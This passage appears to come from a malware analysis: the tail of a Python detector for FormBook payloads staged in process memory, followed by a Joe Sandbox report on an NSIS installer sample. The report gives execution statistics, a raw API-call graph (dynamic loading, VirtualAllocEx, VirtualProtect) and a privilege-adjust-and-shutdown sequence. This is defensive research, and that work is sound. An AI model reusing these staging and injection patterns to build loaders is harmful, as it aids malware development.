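        print(f"target {target}: {code}: {detail}")
```

Run stand-alone it prints one line per finding; the two FormBook rules hit the same RW private region, so they produce two `staged-payload-mem` lines for Target ID 3, which is the expected shape for a payload written into another process before execution. The `MEM_IMAGE` skip is deliberate: a Yara hit inside a properly mapped image would need different handling (on-disk file match) rather than the injection heuristics applied here.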


                                                  Execution Graph

                                                  Execution Coverage:19.7%
                                                  Dynamic/Decrypted Code Coverage:13.9%
                                                  Signature Coverage:16.3%
                                                  Total number of Nodes:1542
                                                  Total number of Limit Nodes:47
                                                  Execution graph node/edge data (rendered as an interactive graph in the original report; the raw serialization is not reproduced here). Nodes cover the main image (functions in the 0x401000 to 0x4065xx range) and a second, unnamed module in the 0x6feb1000 range. Win32 APIs referenced by the graph nodes, grouped:
                                                  • Token and shutdown: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
                                                  • Process, thread and module control: CreateProcessA, CreateThread, WaitForSingleObject, GetExitCodeProcess, ShellExecuteExA, CloseHandle, LoadLibraryExA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, FreeLibrary, GetCommandLineA, SetEnvironmentVariableA, Sleep, GetTickCount
                                                  • File system: GetFileAttributesA, SetFileAttributesA, SetFileSecurityA, CreateFileA, ReadFile, WriteFile, SetFilePointer, GetFileSize, CopyFileA, MoveFileA, MoveFileExA, DeleteFileA, CreateDirectoryA, RemoveDirectoryA, SetCurrentDirectoryA, FindFirstFileA, FindNextFileA, FindClose, GetTempPathA, GetTempFileNameA, GetShortPathNameA, CompareFileTime, SetFileTime, SHFileOperationA, GetPrivateProfileStringA, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetFileInfoA
                                                  • Registry: RegOpenKeyExA, RegCreateKeyExA, RegQueryValueExA, RegSetValueExA, RegCloseKey
                                                  • Memory: GlobalAlloc, GlobalFree, GlobalSize, GlobalLock, GlobalUnlock, VirtualFree
                                                  • Clipboard: OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard
                                                  • COM and string handling: OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree, IIDFromString, MultiByteToWideChar, WideCharToMultiByte, lstrcpyA, lstrcpynA, lstrcatA, lstrlenA, lstrcmpA, lstrcmpiA, wsprintfA, CharNextA, CharPrevA
                                                  • Window and dialog handling: CreateWindowExA, RegisterClassA, GetClassInfoA, DialogBoxParamA, CreateDialogParamA, DestroyWindow, ShowWindow, EnableWindow, SendMessageA, PeekMessageA, DispatchMessageA, DefWindowProcA, MessageBoxIndirectA, SetForegroundWindow, GetDlgItem, GetDlgItemTextA, SetDlgItemTextA, CheckDlgButton, SetWindowTextA, GetWindowLongA, SetWindowLongA, GetWindowRect, GetClientRect, GetSystemMetrics, SystemParametersInfoA, CreatePopupMenu, AppendMenuA, TrackPopupMenu, LoadImageA, LoadCursorA, SetCursor, BeginPaint, EndPaint, FillRect, InvalidateRect, CreateBrushIndirect, CreateFontIndirectA, DeleteObject, GetSysColor, SetTextColor, SetBkColor, SetBkMode, MulDiv, GetMessagePos, ScreenToClient, ImageList_Destroy
                                                  • Other: SetErrorMode, GetVersion, GetLastError
                                                  The graph data is truncated at the end of the page.
5374->5377 5377->5376 5378 401bba 5383 4060f7 lstrcpynA 5378->5383 5380 401bc9 5385 4060f7 lstrcpynA 5380->5385 5382->5378 5383->5380 5384->5373 5385->5376 4375 402588 4387 402c0e 4375->4387 4378 402bac 17 API calls 4379 40259b 4378->4379 4380 4025a9 4379->4380 4385 4027bf 4379->4385 4381 4025c2 RegEnumValueA 4380->4381 4382 4025b6 RegEnumKeyA 4380->4382 4383 4025de RegCloseKey 4381->4383 4384 4025d7 4381->4384 4382->4383 4383->4385 4384->4383 4388 402bce 17 API calls 4387->4388 4389 402c25 4388->4389 4390 405f7d RegOpenKeyExA 4389->4390 4391 402592 4390->4391 4391->4378 4392 401389 4394 401390 4392->4394 4393 4013fe 4394->4393 4395 4013cb MulDiv SendMessageA 4394->4395 4395->4394 4396 6feb2921 4397 6feb2971 4396->4397 4398 6feb2931 VirtualProtect 4396->4398 4398->4397 5386 40460d 5387 404639 5386->5387 5388 40464a 5386->5388 5447 4057f7 GetDlgItemTextA 5387->5447 5390 404656 GetDlgItem 5388->5390 5395 4046b5 5388->5395 5392 40466a 5390->5392 5391 404644 5394 4063d2 5 API calls 5391->5394 5397 40467e SetWindowTextA 5392->5397 5402 405b28 4 API calls 5392->5402 5393 404799 5445 404943 5393->5445 5449 4057f7 GetDlgItemTextA 5393->5449 5394->5388 5395->5393 5399 40618a 17 API calls 5395->5399 5395->5445 5400 40417b 18 API calls 5397->5400 5398 4047c9 5403 405b7d 18 API calls 5398->5403 5404 404729 SHBrowseForFolderA 5399->5404 5405 40469a 5400->5405 5401 4041e2 8 API calls 5406 404957 5401->5406 5407 404674 5402->5407 5408 4047cf 5403->5408 5404->5393 5409 404741 CoTaskMemFree 5404->5409 5410 40417b 18 API calls 5405->5410 5407->5397 5411 405a8f 3 API calls 5407->5411 5450 4060f7 lstrcpynA 5408->5450 5412 405a8f 3 API calls 5409->5412 5413 4046a8 5410->5413 5411->5397 5414 40474e 5412->5414 5448 4041b0 SendMessageA 5413->5448 5417 404785 SetDlgItemTextA 5414->5417 5422 40618a 17 API calls 5414->5422 5417->5393 5418 4046ae 5420 406500 5 API calls 5418->5420 5419 4047e6 5421 406500 5 API calls 5419->5421 5420->5395 5429 4047ed 5421->5429 5423 40476d lstrcmpiA 5422->5423 
5423->5417 5426 40477e lstrcatA 5423->5426 5424 404829 5451 4060f7 lstrcpynA 5424->5451 5426->5417 5427 404830 5428 405b28 4 API calls 5427->5428 5430 404836 GetDiskFreeSpaceA 5428->5430 5429->5424 5432 405ad6 2 API calls 5429->5432 5434 404881 5429->5434 5433 40485a MulDiv 5430->5433 5430->5434 5432->5429 5433->5434 5435 404a89 20 API calls 5434->5435 5437 4048f2 5434->5437 5439 4048df 5435->5439 5436 404915 5452 40419d EnableWindow 5436->5452 5437->5436 5438 40140b 2 API calls 5437->5438 5438->5436 5441 4048f4 SetDlgItemTextA 5439->5441 5442 4048e4 5439->5442 5441->5437 5444 4049c4 20 API calls 5442->5444 5443 404931 5443->5445 5446 404566 SendMessageA 5443->5446 5444->5437 5445->5401 5446->5445 5447->5391 5448->5418 5449->5398 5450->5419 5451->5427 5452->5443 5453 401490 5454 40521e 24 API calls 5453->5454 5455 401497 5454->5455 5456 405192 5457 4051a2 5456->5457 5458 4051b6 5456->5458 5459 4051a8 5457->5459 5468 4051ff 5457->5468 5460 4051be IsWindowVisible 5458->5460 5464 4051d5 5458->5464 5462 4041c7 SendMessageA 5459->5462 5463 4051cb 5460->5463 5460->5468 5461 405204 CallWindowProcA 5465 4051b2 5461->5465 5462->5465 5466 404ace 5 API calls 5463->5466 5464->5461 5467 404b4e 4 API calls 5464->5467 5466->5464 5467->5468 5468->5461 5469 6feb1638 5470 6feb1667 5469->5470 5471 6feb1a98 18 API calls 5470->5471 5472 6feb166e 5471->5472 5473 6feb1681 5472->5473 5474 6feb1675 5472->5474 5476 6feb168b 5473->5476 5477 6feb16a8 5473->5477 5475 6feb1266 2 API calls 5474->5475 5486 6feb167f 5475->5486 5480 6feb14e2 3 API calls 5476->5480 5478 6feb16ae 5477->5478 5479 6feb16d2 5477->5479 5481 6feb1559 3 API calls 5478->5481 5482 6feb14e2 3 API calls 5479->5482 5483 6feb1690 5480->5483 5485 6feb16b3 5481->5485 5482->5486 5484 6feb1559 3 API calls 5483->5484 5487 6feb1696 5484->5487 5488 6feb1266 2 API calls 5485->5488 5489 6feb1266 2 API calls 5487->5489 5490 6feb16b9 GlobalFree 5488->5490 5491 6feb169c GlobalFree 5489->5491 5490->5486 5492 6feb16cd GlobalFree 5490->5492 
5491->5486 5492->5486 4404 402516 4405 402c0e 17 API calls 4404->4405 4406 402520 4405->4406 4407 402bce 17 API calls 4406->4407 4408 402529 4407->4408 4409 402533 RegQueryValueExA 4408->4409 4412 4027bf 4408->4412 4410 402559 RegCloseKey 4409->4410 4411 402553 4409->4411 4410->4412 4411->4410 4415 406055 wsprintfA 4411->4415 4415->4410 5493 6feb103d 5496 6feb101b 5493->5496 5497 6feb14bb GlobalFree 5496->5497 5498 6feb1020 5497->5498 5499 6feb1027 GlobalAlloc 5498->5499 5500 6feb1024 5498->5500 5499->5500 5501 6feb14e2 3 API calls 5500->5501 5502 6feb103b 5501->5502 4458 40239c 4459 4023a4 4458->4459 4460 4023aa 4458->4460 4462 402bce 17 API calls 4459->4462 4461 4023ba 4460->4461 4463 402bce 17 API calls 4460->4463 4464 402bce 17 API calls 4461->4464 4466 4023c8 4461->4466 4462->4460 4463->4461 4464->4466 4465 402bce 17 API calls 4467 4023d1 WritePrivateProfileStringA 4465->4467 4466->4465 5503 6feb1837 5505 6feb185a 5503->5505 5504 6feb189c 5507 6feb1266 2 API calls 5504->5507 5505->5504 5506 6feb188a GlobalFree 5505->5506 5506->5504 5508 6feb1a1e GlobalFree GlobalFree 5507->5508 4468 40209d 4469 4020af 4468->4469 4478 40215d 4468->4478 4470 402bce 17 API calls 4469->4470 4471 4020b6 4470->4471 4473 402bce 17 API calls 4471->4473 4472 401423 24 API calls 4479 4022e2 4472->4479 4474 4020bf 4473->4474 4475 4020d4 LoadLibraryExA 4474->4475 4476 4020c7 GetModuleHandleA 4474->4476 4477 4020e4 GetProcAddress 4475->4477 4475->4478 4476->4475 4476->4477 4480 402130 4477->4480 4481 4020f3 4477->4481 4478->4472 4482 40521e 24 API calls 4480->4482 4483 402112 4481->4483 4484 4020fb 4481->4484 4485 402103 4482->4485 4489 6feb16db 4483->4489 4531 401423 4484->4531 4485->4479 4487 402151 FreeLibrary 4485->4487 4487->4479 4490 6feb170b 4489->4490 4534 6feb1a98 4490->4534 4492 6feb1712 4493 6feb1834 4492->4493 4494 6feb172a 4492->4494 4495 6feb1723 4492->4495 4493->4485 4568 6feb22f1 4494->4568 4584 6feb22af 4495->4584 4500 6feb178e 4506 6feb17dc 4500->4506 4507 6feb1794 
4500->4507 4501 6feb1770 4597 6feb24d8 4501->4597 4502 6feb1759 4517 6feb174f 4502->4517 4594 6feb2cc3 4502->4594 4503 6feb1740 4505 6feb1746 4503->4505 4511 6feb1751 4503->4511 4505->4517 4578 6feb2a38 4505->4578 4509 6feb24d8 11 API calls 4506->4509 4616 6feb156b 4507->4616 4515 6feb17cd 4509->4515 4510 6feb1776 4608 6feb1559 4510->4608 4588 6feb26b2 4511->4588 4530 6feb1823 4515->4530 4622 6feb249e 4515->4622 4517->4500 4517->4501 4519 6feb24d8 11 API calls 4519->4515 4521 6feb1757 4521->4517 4523 6feb182d GlobalFree 4523->4493 4527 6feb180f 4527->4530 4626 6feb14e2 wsprintfA 4527->4626 4528 6feb1808 FreeLibrary 4528->4527 4530->4493 4530->4523 4532 40521e 24 API calls 4531->4532 4533 401431 4532->4533 4533->4485 4629 6feb1215 GlobalAlloc 4534->4629 4536 6feb1abf 4630 6feb1215 GlobalAlloc 4536->4630 4538 6feb1d00 GlobalFree GlobalFree GlobalFree 4539 6feb1d1d 4538->4539 4550 6feb1d67 4538->4550 4541 6feb20f1 4539->4541 4547 6feb1d32 4539->4547 4539->4550 4540 6feb1bbd GlobalAlloc 4558 6feb1aca 4540->4558 4542 6feb2113 GetModuleHandleA 4541->4542 4541->4550 4543 6feb2139 4542->4543 4544 6feb2124 LoadLibraryA 4542->4544 4637 6feb15c2 GetProcAddress 4543->4637 4544->4543 4544->4550 4545 6feb1c08 lstrcpyA 4549 6feb1c12 lstrcpyA 4545->4549 4546 6feb1c26 GlobalFree 4546->4558 4547->4550 4633 6feb1224 4547->4633 4549->4558 4550->4492 4551 6feb218a 4551->4550 4555 6feb2197 lstrlenA 4551->4555 4552 6feb1fb7 4636 6feb1215 GlobalAlloc 4552->4636 4638 6feb15c2 GetProcAddress 4555->4638 4556 6feb214b 4556->4551 4566 6feb2174 GetProcAddress 4556->4566 4558->4538 4558->4540 4558->4545 4558->4546 4558->4549 4558->4550 4558->4552 4559 6feb1ef9 GlobalFree 4558->4559 4560 6feb2033 4558->4560 4561 6feb1c64 4558->4561 4563 6feb1224 2 API calls 4558->4563 4559->4558 4560->4550 4565 6feb208c lstrcpyA 4560->4565 4561->4558 4631 6feb1534 GlobalSize GlobalAlloc 4561->4631 4562 6feb21b0 4562->4550 4563->4558 4565->4550 4566->4551 4567 6feb1fbf 4567->4492 4569 6feb230a 4568->4569 4571 
6feb2446 GlobalFree 4569->4571 4573 6feb23b8 GlobalAlloc MultiByteToWideChar 4569->4573 4574 6feb1224 GlobalAlloc lstrcpynA 4569->4574 4575 6feb2405 4569->4575 4640 6feb12ad 4569->4640 4571->4569 4572 6feb1730 4571->4572 4572->4502 4572->4503 4572->4517 4573->4575 4576 6feb23e4 GlobalAlloc CLSIDFromString GlobalFree 4573->4576 4574->4569 4575->4571 4644 6feb2646 4575->4644 4576->4571 4581 6feb2a4a 4578->4581 4579 6feb2aef VirtualAllocEx 4580 6feb2b0d 4579->4580 4647 6feb29e4 4580->4647 4581->4579 4583 6feb2bd9 4583->4517 4585 6feb22c4 4584->4585 4586 6feb22cf GlobalAlloc 4585->4586 4587 6feb1729 4585->4587 4586->4585 4587->4494 4592 6feb26e2 4588->4592 4589 6feb277d GlobalAlloc 4593 6feb27a0 4589->4593 4590 6feb2790 4591 6feb2796 GlobalSize 4590->4591 4590->4593 4591->4593 4592->4589 4592->4590 4593->4521 4596 6feb2cce 4594->4596 4595 6feb2d0e GlobalFree 4596->4595 4651 6feb1215 GlobalAlloc 4597->4651 4599 6feb2598 WideCharToMultiByte 4605 6feb24e4 4599->4605 4600 6feb2563 lstrcpynA 4600->4605 4601 6feb2574 StringFromGUID2 WideCharToMultiByte 4601->4605 4602 6feb25b9 wsprintfA 4602->4605 4603 6feb25dd GlobalFree 4603->4605 4604 6feb2617 GlobalFree 4604->4510 4605->4599 4605->4600 4605->4601 4605->4602 4605->4603 4605->4604 4606 6feb1266 2 API calls 4605->4606 4652 6feb12d1 4605->4652 4606->4605 4656 6feb1215 GlobalAlloc 4608->4656 4610 6feb155e 4611 6feb156b 2 API calls 4610->4611 4612 6feb1568 4611->4612 4613 6feb1266 4612->4613 4614 6feb12a8 GlobalFree 4613->4614 4615 6feb126f GlobalAlloc lstrcpynA 4613->4615 4614->4515 4615->4614 4617 6feb1577 wsprintfA 4616->4617 4618 6feb15a4 lstrcpyA 4616->4618 4621 6feb15bd 4617->4621 4618->4621 4621->4519 4623 6feb24ac 4622->4623 4625 6feb17ef 4622->4625 4624 6feb24c5 GlobalFree 4623->4624 4623->4625 4624->4623 4625->4527 4625->4528 4627 6feb1266 2 API calls 4626->4627 4628 6feb1503 4627->4628 4628->4530 4629->4536 4630->4558 4632 6feb1552 4631->4632 4632->4561 4639 6feb1215 GlobalAlloc 4633->4639 4635 6feb1233 lstrcpynA 
4635->4550 4636->4567 4637->4556 4638->4562 4639->4635 4641 6feb12b4 4640->4641 4642 6feb1224 2 API calls 4641->4642 4643 6feb12cf 4642->4643 4643->4569 4645 6feb26aa 4644->4645 4646 6feb2654 VirtualAlloc 4644->4646 4645->4575 4646->4645 4648 6feb29ef 4647->4648 4649 6feb29ff 4648->4649 4650 6feb29f4 GetLastError 4648->4650 4649->4583 4650->4649 4651->4605 4653 6feb12da 4652->4653 4654 6feb12f9 4652->4654 4653->4654 4655 6feb12e0 lstrcpyA 4653->4655 4654->4605 4655->4654 4656->4610 4657 40159d 4658 402bce 17 API calls 4657->4658 4659 4015a4 SetFileAttributesA 4658->4659 4660 4015b6 4659->4660 5509 40149d 5510 4014ab PostQuitMessage 5509->5510 5511 402387 5509->5511 5510->5511 4661 401a1e 4662 402bce 17 API calls 4661->4662 4663 401a27 ExpandEnvironmentStringsA 4662->4663 4664 401a3b 4663->4664 4666 401a4e 4663->4666 4665 401a40 lstrcmpA 4664->4665 4664->4666 4665->4666 4667 40171f 4668 402bce 17 API calls 4667->4668 4669 401726 SearchPathA 4668->4669 4670 401741 4669->4670 5517 401d1f 5518 402bac 17 API calls 5517->5518 5519 401d26 5518->5519 5520 402bac 17 API calls 5519->5520 5521 401d32 GetDlgItem 5520->5521 5522 402620 5521->5522 4678 402421 4679 402453 4678->4679 4680 402428 4678->4680 4682 402bce 17 API calls 4679->4682 4681 402c0e 17 API calls 4680->4681 4683 40242f 4681->4683 4684 40245a 4682->4684 4685 402439 4683->4685 4688 402467 4683->4688 4690 402c8c 4684->4690 4687 402bce 17 API calls 4685->4687 4689 402440 RegDeleteValueA RegCloseKey 4687->4689 4689->4688 4691 402c9f 4690->4691 4693 402c98 4690->4693 4691->4693 4694 402cd0 4691->4694 4693->4688 4695 405f7d RegOpenKeyExA 4694->4695 4696 402cfe 4695->4696 4697 402db3 4696->4697 4698 402d08 4696->4698 4697->4693 4699 402d0e RegEnumValueA 4698->4699 4703 402d31 4698->4703 4700 402d98 RegCloseKey 4699->4700 4699->4703 4700->4697 4701 402d6d RegEnumKeyA 4702 402d76 RegCloseKey 4701->4702 4701->4703 4704 406500 5 API calls 4702->4704 4703->4700 4703->4701 4703->4702 4705 402cd0 6 API calls 4703->4705 4706 
402d86 4704->4706 4705->4703 4707 402da8 4706->4707 4708 402d8a RegDeleteKeyA 4706->4708 4707->4697 4708->4697 4709 4027a1 4710 402bce 17 API calls 4709->4710 4711 4027a8 FindFirstFileA 4710->4711 4712 4027cb 4711->4712 4716 4027bb 4711->4716 4713 4027d2 4712->4713 4717 406055 wsprintfA 4712->4717 4718 4060f7 lstrcpynA 4713->4718 4717->4713 4718->4716 5523 402626 5524 40262b 5523->5524 5525 40263f 5523->5525 5527 402bac 17 API calls 5524->5527 5526 402bce 17 API calls 5525->5526 5528 402646 lstrlenA 5526->5528 5529 402634 5527->5529 5528->5529 5530 405d37 WriteFile 5529->5530 5531 402668 5529->5531 5530->5531 5532 403ca7 5533 403dfa 5532->5533 5534 403cbf 5532->5534 5536 403e4b 5533->5536 5537 403e0b GetDlgItem GetDlgItem 5533->5537 5534->5533 5535 403ccb 5534->5535 5539 403cd6 SetWindowPos 5535->5539 5540 403ce9 5535->5540 5538 403ea5 5536->5538 5546 401389 2 API calls 5536->5546 5541 40417b 18 API calls 5537->5541 5542 4041c7 SendMessageA 5538->5542 5593 403df5 5538->5593 5539->5540 5543 403d06 5540->5543 5544 403cee ShowWindow 5540->5544 5545 403e35 SetClassLongA 5541->5545 5590 403eb7 5542->5590 5547 403d28 5543->5547 5548 403d0e DestroyWindow 5543->5548 5544->5543 5549 40140b 2 API calls 5545->5549 5550 403e7d 5546->5550 5551 403d2d SetWindowLongA 5547->5551 5552 403d3e 5547->5552 5600 404104 5548->5600 5549->5536 5550->5538 5554 403e81 SendMessageA 5550->5554 5551->5593 5553 403d4a GetDlgItem 5552->5553 5566 403db5 5552->5566 5557 403d5d SendMessageA IsWindowEnabled 5553->5557 5560 403d7a 5553->5560 5554->5593 5555 40140b 2 API calls 5555->5590 5556 404106 DestroyWindow EndDialog 5556->5600 5557->5560 5557->5593 5558 4041e2 8 API calls 5558->5593 5559 404135 ShowWindow 5559->5593 5562 403d87 5560->5562 5563 403dce SendMessageA 5560->5563 5564 403d9a 5560->5564 5572 403d7f 5560->5572 5561 40618a 17 API calls 5561->5590 5562->5563 5562->5572 5563->5566 5567 403da2 5564->5567 5568 403db7 5564->5568 5565 404154 SendMessageA 5565->5566 5566->5558 5571 40140b 2 API 
calls 5567->5571 5570 40140b 2 API calls 5568->5570 5569 40417b 18 API calls 5569->5590 5570->5572 5571->5572 5572->5565 5572->5566 5573 40417b 18 API calls 5574 403f32 GetDlgItem 5573->5574 5575 403f47 5574->5575 5576 403f4f ShowWindow EnableWindow 5574->5576 5575->5576 5601 40419d EnableWindow 5576->5601 5578 403f79 EnableWindow 5583 403f8d 5578->5583 5579 403f92 GetSystemMenu EnableMenuItem SendMessageA 5580 403fc2 SendMessageA 5579->5580 5579->5583 5580->5583 5582 403c88 18 API calls 5582->5583 5583->5579 5583->5582 5602 4041b0 SendMessageA 5583->5602 5603 4060f7 lstrcpynA 5583->5603 5585 403ff1 lstrlenA 5586 40618a 17 API calls 5585->5586 5587 404002 SetWindowTextA 5586->5587 5588 401389 2 API calls 5587->5588 5588->5590 5589 404046 DestroyWindow 5591 404060 CreateDialogParamA 5589->5591 5589->5600 5590->5555 5590->5556 5590->5561 5590->5569 5590->5573 5590->5589 5590->5593 5592 404093 5591->5592 5591->5600 5594 40417b 18 API calls 5592->5594 5595 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5594->5595 5596 401389 2 API calls 5595->5596 5597 4040e4 5596->5597 5597->5593 5598 4040ec ShowWindow 5597->5598 5599 4041c7 SendMessageA 5598->5599 5599->5600 5600->5559 5600->5593 5601->5578 5602->5583 5603->5585 4751 40272b 4752 402732 4751->4752 4754 4029aa 4751->4754 4753 402bac 17 API calls 4752->4753 4755 402739 4753->4755 4756 402748 SetFilePointer 4755->4756 4756->4754 4757 402758 4756->4757 4759 406055 wsprintfA 4757->4759 4759->4754 5604 6feb1000 5605 6feb101b 5 API calls 5604->5605 5606 6feb1019 5605->5606 4770 401c2e 4771 402bac 17 API calls 4770->4771 4772 401c35 4771->4772 4773 402bac 17 API calls 4772->4773 4774 401c42 4773->4774 4775 401c57 4774->4775 4776 402bce 17 API calls 4774->4776 4777 401c67 4775->4777 4778 402bce 17 API calls 4775->4778 4776->4775 4779 401c72 4777->4779 4780 401cbe 4777->4780 4778->4777 4781 402bac 17 API calls 4779->4781 4782 402bce 17 API calls 4780->4782 4784 401c77 4781->4784 4783 401cc3 4782->4783 4785 402bce 
17 API calls 4783->4785 4786 402bac 17 API calls 4784->4786 4787 401ccc FindWindowExA 4785->4787 4788 401c83 4786->4788 4791 401cea 4787->4791 4789 401c90 SendMessageTimeoutA 4788->4789 4790 401cae SendMessageA 4788->4790 4789->4791 4790->4791 5607 4042b1 lstrcpynA lstrlenA 4798 401e35 GetDC 4799 402bac 17 API calls 4798->4799 4800 401e47 GetDeviceCaps MulDiv ReleaseDC 4799->4800 4801 402bac 17 API calls 4800->4801 4802 401e78 4801->4802 4803 40618a 17 API calls 4802->4803 4804 401eb5 CreateFontIndirectA 4803->4804 4805 402620 4804->4805 5608 402a35 SendMessageA 5609 402a5a 5608->5609 5610 402a4f InvalidateRect 5608->5610 5610->5609 5611 4014b7 5612 4014bd 5611->5612 5613 401389 2 API calls 5612->5613 5614 4014c5 5613->5614 5615 402dba 5616 402dc9 SetTimer 5615->5616 5618 402de2 5615->5618 5616->5618 5617 402e37 5618->5617 5619 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5618->5619 5619->5617 4852 4015bb 4853 402bce 17 API calls 4852->4853 4854 4015c2 4853->4854 4855 405b28 4 API calls 4854->4855 4868 4015ca 4855->4868 4856 401624 4858 401652 4856->4858 4859 401629 4856->4859 4857 405aba CharNextA 4857->4868 4862 401423 24 API calls 4858->4862 4860 401423 24 API calls 4859->4860 4861 401630 4860->4861 4871 4060f7 lstrcpynA 4861->4871 4869 40164a 4862->4869 4864 405761 2 API calls 4864->4868 4865 40577e 5 API calls 4865->4868 4866 40163b SetCurrentDirectoryA 4866->4869 4867 40160c GetFileAttributesA 4867->4868 4868->4856 4868->4857 4868->4864 4868->4865 4868->4867 4870 4056e4 4 API calls 4868->4870 4870->4868 4871->4866 5620 4016bb 5621 402bce 17 API calls 5620->5621 5622 4016c1 GetFullPathNameA 5621->5622 5623 4016d8 5622->5623 5629 4016f9 5622->5629 5625 40646b 2 API calls 5623->5625 5623->5629 5624 40170d GetShortPathNameA 5626 402a5a 5624->5626 5627 4016e9 5625->5627 5627->5629 5630 4060f7 lstrcpynA 5627->5630 5629->5624 5629->5626 5630->5629

                                                  Control-flow Graph

                                                  [control_flow_graph for the function at 00403348: basic blocks and edges, with calls to SetErrorMode, GetVersion, lstrlenA, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, lstrcmpiA, SetCurrentDirectoryA, CopyFileA and CloseHandle; the raw block/edge list from the interactive graph viewer is not reproduced]
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 0040336D
                                                  • GetVersion.KERNEL32 ref: 00403373
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                  • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                  • OleInitialize.OLE32(00000000), ref: 004033E9
                                                  • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                  • GetCommandLineA.KERNEL32(Aftopningen Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\LkzvfB4VFj.exe",00000020,"C:\Users\user\Desktop\LkzvfB4VFj.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                  • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                    • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75843410), ref: 004039FA
                                                    • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                    • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                    • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                    • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                    • Part of subcall function 00403830: CloseHandle.KERNEL32(000002C4,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                  • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                  • ExitProcess.KERNEL32 ref: 00403688
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                  • ExitProcess.KERNEL32 ref: 0040382A
                                                    • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
